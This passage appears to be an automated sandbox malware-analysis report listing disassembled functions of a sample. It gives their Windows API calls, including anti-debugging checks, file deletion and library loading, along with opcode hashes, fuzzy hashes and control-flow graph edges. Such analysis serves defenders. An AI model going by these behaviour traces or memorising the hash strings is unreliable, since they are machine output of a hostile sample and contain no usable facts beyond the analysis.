                                                        • Opcode ID: fdc12d167c624ed794e7ae87b129d4c666df740c9a85f2cbd36fb426d40fdd5e
                                                        • Instruction ID: dcff10e4f102f7465acebac5b1e4a59f8cb601a9b4257840f4f0a77f0f8c9878
                                                        • Opcode Fuzzy Hash: fdc12d167c624ed794e7ae87b129d4c666df740c9a85f2cbd36fb426d40fdd5e
                                                        • Instruction Fuzzy Hash: 4E135874A00626DFCB60DFB8CA84BADB7B5FB88704F508655C509E7B48DB38EA50CB54
                                                        Function 05127568 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 051275DF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 2933d1d5368b2b58b681a497c95b7b38bfe5019a7fb56d54a435dc96249e15af
                                                        • Instruction ID: 504916e77b0095dc3739e9bc6fd8d4c0ff1f914670daac15fa840461294ca23a
                                                        • Opcode Fuzzy Hash: 2933d1d5368b2b58b681a497c95b7b38bfe5019a7fb56d54a435dc96249e15af
                                                        • Instruction Fuzzy Hash: F721287180025A8FDB10CF9AD884BEEFBF4EF49310F14845AE455A7250D778A944CFA5
                                                        Function 011375A0 Relevance: 1.0, Instructions: 977COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5bd55019969880f43f6a6cee46efb1c41e445820baf5e21477eb1154bf14071
                                                        • Instruction ID: 7b18fc8ae6bb34486c745a728041c9343f1868efd22f20992addf658005a788b
                                                        • Opcode Fuzzy Hash: e5bd55019969880f43f6a6cee46efb1c41e445820baf5e21477eb1154bf14071
                                                        • Instruction Fuzzy Hash: FC829270A002199FDB19DF69C894AAEBBB6FFC8304F158559E505EB3A9DB30DC42CB50
                                                        Function 01138331 Relevance: .9, Instructions: 877COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e6cfbc9ab69aea821d267d173511a23b5da9a27ab250489eaf528e2a398ce639
                                                        • Instruction ID: 0ed1a67a77fa6bc470409d8c01ad8c4b5f4f3dd74982f1f528df9305b2208276
                                                        • Opcode Fuzzy Hash: e6cfbc9ab69aea821d267d173511a23b5da9a27ab250489eaf528e2a398ce639
                                                        • Instruction Fuzzy Hash: C8826131A00515CFCB19CF68D984AAEBBF2FF88314F158659F509AB269D730ED41CB61
                                                        Function 0B2F2B00 Relevance: .7, Instructions: 705COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e11eef9e377862a9b833ec10b493b121cd7bb58f799dd63089556bc2b222aa5
                                                        • Instruction ID: 8b246fc6627cb0c1ea0f49fdc06e9f1924793ab724ed3d6259da950bcd9d7d3e
                                                        • Opcode Fuzzy Hash: 0e11eef9e377862a9b833ec10b493b121cd7bb58f799dd63089556bc2b222aa5
                                                        • Instruction Fuzzy Hash: 2D42FE31E013458FC709EFB9D884A6EBBF2FF89200F1585AAD049EB351EE349945CB91
                                                        Function 09700848 Relevance: .6, Instructions: 596COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3812e57667bf9ee8da7ae3252e85b365fb80b7ea62d09c78f2630f15bce3111
                                                        • Instruction ID: b5e78c8d816fd2c38d063c29ff95f3ca0845b8bb787492f557fb37dc7b75fbe9
                                                        • Opcode Fuzzy Hash: e3812e57667bf9ee8da7ae3252e85b365fb80b7ea62d09c78f2630f15bce3111
                                                        • Instruction Fuzzy Hash: 1A524C34A00746CFDB14DF28C844B99B7F2EF85314F2582A9D5586F3A2DB71A986CF81
                                                        Function 09700844 Relevance: .6, Instructions: 583COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da51205ca0e4d009b1bb6db8ed65cefcb0a19167468c0487fc37509d7fceeb02
                                                        • Instruction ID: 9ee089e18af6e35c78799ab6d2cfafb2da226acc854144ff2e5396c33b7c1258
                                                        • Opcode Fuzzy Hash: da51205ca0e4d009b1bb6db8ed65cefcb0a19167468c0487fc37509d7fceeb02
                                                        • Instruction Fuzzy Hash: 8B525C34A00746CFDB14DF28C844B99B7B2FF85314F2582A9D5586F3A2DB71A986CF81
                                                        Function 097280B8 Relevance: .3, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68ba0ba8277e19e06e112251b719230c7dbc3276f2df1e75d5931bf58a2343f0
                                                        • Instruction ID: 25ce4e458bb9019db4177c8fcb04bca7c0083f1b243100befd2709e4da8280d3
                                                        • Opcode Fuzzy Hash: 68ba0ba8277e19e06e112251b719230c7dbc3276f2df1e75d5931bf58a2343f0
                                                        • Instruction Fuzzy Hash: B181C575F002288FDB18EB7998542BE7BB3BFC8B00B15851DE046E7389CE369C018796
                                                        Function 098AA78A Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA816
                                                        • GetCurrentThread.KERNEL32 ref: 098AA853
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA890
                                                        • GetCurrentThreadId.KERNEL32 ref: 098AA8E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 8149b6d0f8d21869fe5b841068c96a32e0d2041ca24cd2ad070db3dad241541e
                                                        • Instruction ID: d27541d0485cb3da3faea426b0b8e4e1ff3807efe691a699f689c0fe2c5843da
                                                        • Opcode Fuzzy Hash: 8149b6d0f8d21869fe5b841068c96a32e0d2041ca24cd2ad070db3dad241541e
                                                        • Instruction Fuzzy Hash: 915158B090060ACFEB04CFA9D648BDEBBF1EF88314F208059E519A7360D7399945CF69
                                                        Function 098AA798 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA816
                                                        • GetCurrentThread.KERNEL32 ref: 098AA853
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA890
                                                        • GetCurrentThreadId.KERNEL32 ref: 098AA8E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: bdc58d302ce25739af294a48ddab85847f5163918ec8491b601f7481e68b3007
                                                        • Instruction ID: b60ccfb3c27be645b8bddd9f475d920421a4a6d744cbc99225c2988ba6ef4d1c
                                                        • Opcode Fuzzy Hash: bdc58d302ce25739af294a48ddab85847f5163918ec8491b601f7481e68b3007
                                                        • Instruction Fuzzy Hash: 625148B0900609CFEB14CFA9D548BDEBBF5EF88314F208059E419A7360D7395945CF69
                                                        Function 098A87F0 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6064 98a87f0-98a87ff 6065 98a882b-98a882f 6064->6065 6066 98a8801-98a880e call 98a77b4 6064->6066 6067 98a8843-98a8884 6065->6067 6068 98a8831-98a883b 6065->6068 6071 98a8810 6066->6071 6072 98a8824 6066->6072 6075 98a8891-98a889f 6067->6075 6076 98a8886-98a888e 6067->6076 6068->6067 6123 98a8816 call 98a8a88 6071->6123 6124 98a8816 call 98a8a78 6071->6124 6072->6065 6078 98a88c3-98a88c5 6075->6078 6079 98a88a1-98a88a6 6075->6079 6076->6075 6077 98a881c-98a881e 6077->6072 6083 98a8960-98a89dd 6077->6083 6082 98a88c8-98a88cf 6078->6082 6080 98a88a8-98a88af call 98a77c0 6079->6080 6081 98a88b1 6079->6081 6084 98a88b3-98a88c1 6080->6084 6081->6084 6086 98a88dc-98a88e3 6082->6086 6087 98a88d1-98a88d9 6082->6087 6114 98a89df-98a89ee 6083->6114 6115 98a89f0-98a8a20 6083->6115 6084->6082 6089 98a88f0-98a88f9 call 98a77d0 6086->6089 6090 98a88e5-98a88ed 6086->6090 6087->6086 6095 98a88fb-98a8903 6089->6095 6096 98a8906-98a890b 6089->6096 6090->6089 6095->6096 6098 98a8929-98a892d 6096->6098 6099 98a890d-98a8914 6096->6099 6121 98a8930 call 98a8d88 6098->6121 6122 98a8930 call 98a8d78 6098->6122 6099->6098 6100 98a8916-98a8926 call 98a83dc call 98a83ec 6099->6100 6100->6098 6101 98a8933-98a8936 6105 98a8938-98a8956 6101->6105 6106 98a8959-98a895f 6101->6106 6105->6106 6114->6115 6116 98a8a28-98a8a53 GetModuleHandleW 6115->6116 6117 98a8a22-98a8a25 6115->6117 6118 98a8a5c-98a8a70 6116->6118 6119 98a8a55-98a8a5b 6116->6119 6117->6116 6119->6118 6121->6101 6122->6101 6123->6077 6124->6077
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 098A8A46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 107ff034ad299682a75f2277faa12f0492054b2c068fa0aa668a5410d7d9a6c0
                                                        • Instruction ID: 6fc1ab1a43544fb423d4d3ed2cb2183217240cf3e4346b09e6e28de856cea77d
                                                        • Opcode Fuzzy Hash: 107ff034ad299682a75f2277faa12f0492054b2c068fa0aa668a5410d7d9a6c0
                                                        • Instruction Fuzzy Hash: C7814470A00B058FEB24DF2AD44575ABBF1BF88314F00892DE59AD7B50DB74E845CBA1
                                                        Function 098AEE04 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6125 98aee04-98aee76 6126 98aee78-98aee7e 6125->6126 6127 98aee81-98aee88 6125->6127 6126->6127 6128 98aee8a-98aee90 6127->6128 6129 98aee93-98aeecb 6127->6129 6128->6129 6130 98aeed3-98aef32 CreateWindowExW 6129->6130 6131 98aef3b-98aef73 6130->6131 6132 98aef34-98aef3a 6130->6132 6136 98aef80 6131->6136 6137 98aef75-98aef78 6131->6137 6132->6131 6138 98aef81 6136->6138 6137->6136 6138->6138
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 098AEF22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: cc61a8b9f485f95470295c8f168691f190fa69d09867d4b3d5a4a316e0fa1cd4
                                                        • Instruction ID: 0f0223afffda1a27f2b349da0a9aea7c74c6b2d2a5f7f54190ab23ff1931e249
                                                        • Opcode Fuzzy Hash: cc61a8b9f485f95470295c8f168691f190fa69d09867d4b3d5a4a316e0fa1cd4
                                                        • Instruction Fuzzy Hash: 7851BFB1D003499FEB14CF9AD984ADEBBB5FF48310F64852AE818AB211D7749845CF90
                                                        Function 098AEE10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6139 98aee10-98aee76 6140 98aee78-98aee7e 6139->6140 6141 98aee81-98aee88 6139->6141 6140->6141 6142 98aee8a-98aee90 6141->6142 6143 98aee93-98aef32 CreateWindowExW 6141->6143 6142->6143 6145 98aef3b-98aef73 6143->6145 6146 98aef34-98aef3a 6143->6146 6150 98aef80 6145->6150 6151 98aef75-98aef78 6145->6151 6146->6145 6152 98aef81 6150->6152 6151->6150 6152->6152
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 098AEF22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: f65a7f15c2d7adea3cad064620b51d9faa3449d665572a03cda827442b50db2f
                                                        • Instruction ID: 6d4837b3aa6073c0b9d0021be84637e9a96965e591e1c2e900951996e67dad48
                                                        • Opcode Fuzzy Hash: f65a7f15c2d7adea3cad064620b51d9faa3449d665572a03cda827442b50db2f
                                                        • Instruction Fuzzy Hash: 0F41AEB1D003499FEB14CF9AD884ADEBBB5FF48310F64852AE818AB351D775A845CF90
                                                        Function 097286FF Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6153 97286ff-972870a 6154 9728752-9728756 6153->6154 6155 972870c-972871d 6153->6155 6156 972871f-9728750 6154->6156 6157 9728757-9728782 6154->6157 6155->6156 6156->6154 6159 9728784-9728787 6157->6159 6160 972878a-97287b5 DeleteFileW 6157->6160 6159->6160 6161 97287b7-97287bd 6160->6161 6162 97287be-97287e6 6160->6162 6161->6162
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 097287A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: ddac701140d62de4f10aa53724c1318d46f18b17124d5e1ad05c9ce45df8ad83
                                                        • Instruction ID: 8d9bae3137a81bdcdb9ef6a750e0cb1fbe3c3b0997cc0c6c83ef144b039c91a2
                                                        • Opcode Fuzzy Hash: ddac701140d62de4f10aa53724c1318d46f18b17124d5e1ad05c9ce45df8ad83
                                                        • Instruction Fuzzy Hash: 8031C1B6C097958FCB02DFA5C8102D9BFB0AF46210F1A41DBC494EB293D3385905CBA2
                                                        Function 0512F4B0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0512F571
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: d50ab3bc0a34fc4635f3e40211d0f82461b84bed141a41da0a3706242c30a937
                                                        • Instruction ID: b5790a0e149af9e82543f7c27aa7a13ee00a8f9658ac4002fe5e072015573cb9
                                                        • Opcode Fuzzy Hash: d50ab3bc0a34fc4635f3e40211d0f82461b84bed141a41da0a3706242c30a937
                                                        • Instruction Fuzzy Hash: 11411AB590021ACFDB14CF99C489AAABBF5FB88314F24C45DD519AB361D734A852CFA0
                                                        Function 05127560 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 051275DF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 1d29e0a26dc9641429ac9d37f6af65f0c4de77061126e53a0dc8ef9132d54c55
                                                        • Instruction ID: 65707aa8aeaf41b15f56cbc4d95368d09c98bceee7f4ec8b243db24072f3d958
                                                        • Opcode Fuzzy Hash: 1d29e0a26dc9641429ac9d37f6af65f0c4de77061126e53a0dc8ef9132d54c55
                                                        • Instruction Fuzzy Hash: B52125B1C0025ACFDB14CFA9D884BEEBBF4EF49310F14845AE455A7250D7389945CFA5
                                                        Function 098AADE8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 098AAE6F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: b34d2a149d31724ea988f1ec85b5799a8c9e02a16540953757dc92e95ac9d1f7
                                                        • Instruction ID: 2615557c92e459d7ce83648eb1e1b4fc5304aa753de420405d006cc939f450e4
                                                        • Opcode Fuzzy Hash: b34d2a149d31724ea988f1ec85b5799a8c9e02a16540953757dc92e95ac9d1f7
                                                        • Instruction Fuzzy Hash: 3F21C4B59002499FDB10CF9AD984ADEBBF9EB48310F14841AE914A7350D378A954CFA5
                                                        Function 098AADE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 098AAE6F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 1fa54f8cfb7b1a397414fd42f5ba745dd8cf8572c845afd87b3768e434af1586
                                                        • Instruction ID: 95ae8b8e8ee6db17d2830833e44daf8e31e2b3434def01d8dc903066a6bb24bd
                                                        • Opcode Fuzzy Hash: 1fa54f8cfb7b1a397414fd42f5ba745dd8cf8572c845afd87b3768e434af1586
                                                        • Instruction Fuzzy Hash: 9C2103B5D00209DFDB00CFA9D984ADEBBF5EF48310F24801AE918A3350D338A950CFA4
                                                        Function 09728738 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 097287A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: c0da8686319829575436cd86605fb3d0e3917fca72ed14a8152019417748532a
                                                        • Instruction ID: f6f11400010644451e0b5f12c096194707af00054668ee02b716c96e5bade4e6
                                                        • Opcode Fuzzy Hash: c0da8686319829575436cd86605fb3d0e3917fca72ed14a8152019417748532a
                                                        • Instruction Fuzzy Hash: B51136B2C0062A9BDB10CF9AD4447DEFBB4EF48720F14812AD818A7340D338A950CFA5
                                                        Function 098A8418 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,098A8AC1,00000800,00000000,00000000), ref: 098A8CD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 67135cacbd8b675771b781f5e3011ccf392042bda7556d69cda51f6b0d7df6c0
                                                        • Instruction ID: 6834848fb17a2098bbc4dde301abb5331b64df885d187e04a5e774fbace0cf6b
                                                        • Opcode Fuzzy Hash: 67135cacbd8b675771b781f5e3011ccf392042bda7556d69cda51f6b0d7df6c0
                                                        • Instruction Fuzzy Hash: 4C1103B6C002099FDB10CF9AD444A9EFBF4EB88310F14842EE519A7300C779A945CFA4
                                                        Function 098A8C60 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,098A8AC1,00000800,00000000,00000000), ref: 098A8CD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: cb5b264a7281f74f656a0f7e38b77dd4a2ed3118736184e971975abcd4e5d64e
                                                        • Instruction ID: 360ff3030f88eb7015101c1fc5d8c0c7c6e5d29d01075b0e36999ab14ad71524
                                                        • Opcode Fuzzy Hash: cb5b264a7281f74f656a0f7e38b77dd4a2ed3118736184e971975abcd4e5d64e
                                                        • Instruction Fuzzy Hash: D511FFB6C002098FEB10CF9AD444A9EBBF4BB58210F14842AD919A7200C379AA45CFA4
                                                        Function 0512C230 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 0512C2A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        • Opcode ID: 46880d96591a7bbdf82104e5c925ef8dda9c728caf10fa395d9ba4e83fee8219
                                                        • Instruction ID: 720f8c85ebf778e6723b5fc11f4b0996f42b70704e8c604fe46157a85b7f2014
                                                        • Opcode Fuzzy Hash: 46880d96591a7bbdf82104e5c925ef8dda9c728caf10fa395d9ba4e83fee8219
                                                        • Instruction Fuzzy Hash: 601123B1C0065A9BDB14CF9AD544B9EFBB4FB48724F10811AD918B3240C738A950CFE5
                                                        Function 0B2F8031 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B2F8095
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 2a7577872d91269b311e66ced528ce624d01219492de62af441acc2dc940ea36
                                                        • Instruction ID: 6a71ff89c1165e1dc2880cd2bec0267db76bf0d123c6eeb190162824480e4e89
                                                        • Opcode Fuzzy Hash: 2a7577872d91269b311e66ced528ce624d01219492de62af441acc2dc940ea36
                                                        • Instruction Fuzzy Hash: 6011E0B580034ADFDB10CF9AD885BDEFBF8EB48724F208459E558A7250C375A944CFA5
                                                        Function 098A89E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 098A8A46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 3c36df3f86abc7b34ded31f483136cece92b1b504d4dbb22823be8e9c1b000e1
                                                        • Instruction ID: 48746bf5d2ffe1e5e9d7627edfa30258c560e981ff5e423e395a9a77df3d06ab
                                                        • Opcode Fuzzy Hash: 3c36df3f86abc7b34ded31f483136cece92b1b504d4dbb22823be8e9c1b000e1
                                                        • Instruction Fuzzy Hash: C811E0B5C0064A8FDB10CF9AD444ADEFBF4AB88224F10841AD929B7310D379A545CFA5
                                                        Function 0B2F8038 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B2F8095
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 235a2954504a4c87e77ecb4939f73aeefd3abb967d1947894204ec854053c637
                                                        • Instruction ID: cb75638a9154d1c28e916464bc666ff7ed17175eb19bbdddf853bb401cdf8259
                                                        • Opcode Fuzzy Hash: 235a2954504a4c87e77ecb4939f73aeefd3abb967d1947894204ec854053c637
                                                        • Instruction Fuzzy Hash: F711E5B580034ADFDB10CF9AD885BDEFBF8EB48324F208459D558A7250C375A944CFA5
                                                        Function 0512C2CC Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 0512C2A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        • Opcode ID: 20ef1c9bac1d365ed1f4aca10265c4641b13b7af5ff867279102288de1731959
